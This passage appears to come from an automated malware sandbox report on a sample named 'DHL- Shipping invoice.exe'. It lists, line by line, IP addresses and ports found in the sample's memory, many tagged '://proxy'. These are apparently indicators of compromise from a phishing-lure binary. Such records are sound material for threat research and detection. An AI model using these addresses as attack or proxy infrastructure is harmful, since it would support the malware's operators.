                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.231.57:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.231.57:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.94.255.13:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.94.255.13:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.117.215.98:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.117.215.98:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.153.138.184:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.153.138.184:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.208.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.208.126:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.208.126:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.180.139.155
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.180.139.155://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.180.139.155:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.102.92:9443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:11075
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:11075://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:27137
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:27137://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:60325
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:60325://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:64871
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:64871://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.65.98.35:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.65.98.35:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.143.24.66
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.143.24.66://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.143.24.66:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.219.145.108:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.219.145.108:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.228.47.75:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.228.47.75:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.19.58.66:42931
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.19.58.66:42931://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C22000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.47.145.189:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.47.145.189:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.146:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.146:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.193.93.73:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.193.93.73:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98005F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98159F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.244.174:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.244.174:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.233.145.70:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.233.145.70:1080://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.237.62.189:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.237.62.189:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.238.74.91:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.238.74.91:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.121.168:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.121.168:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.248.57.129:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.248.57.129:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981569000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.62.218.250:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.62.218.250:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.9.87.26:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.9.87.26:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.189.118:42539
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.189.118:42539://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814B2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.27.165:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9814B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.27.165:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.174.152:41455
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.174.152:41455://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.65.11:1388
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.65.11:1388://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.237.239.57:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.238.192.52:32667://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.238.192.54:32667
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.238.192.54:32667://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.249.212.26:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.249.212.26:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:39647
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:39647://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.213.214.254:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.213.214.254:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.114:1082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.114:1082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.79.243.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.79.243.103:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.79.243.103:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.103.9:6888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.103.9:6888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.148.190:9876
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.148.190:9876://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.87.72.134:4145.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98220A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.87.72.134:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5279
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5279://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5288
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5288://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111://proxyp
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.134.157:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.134.157:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.251.50:32000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.251.50:32000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.40.8:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.40.8:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.187.216.58:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.187.216.58:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.218.58.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.218.58.54:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.218.58.54:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.230.92.9:8090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.230.92.9:8090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BD6000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.249.65.191:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.249.65.191:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.35.237.187:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.43.10.141
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.43.10.141://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.43.10.141:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.46.249.148:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.46.249.148:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.188.250.16
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.188.250.16://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.188.250.16:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.108.130.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.108.130.111:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.108.130.111:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982293000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:16487
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:16487://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:2572
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:2572://proxy
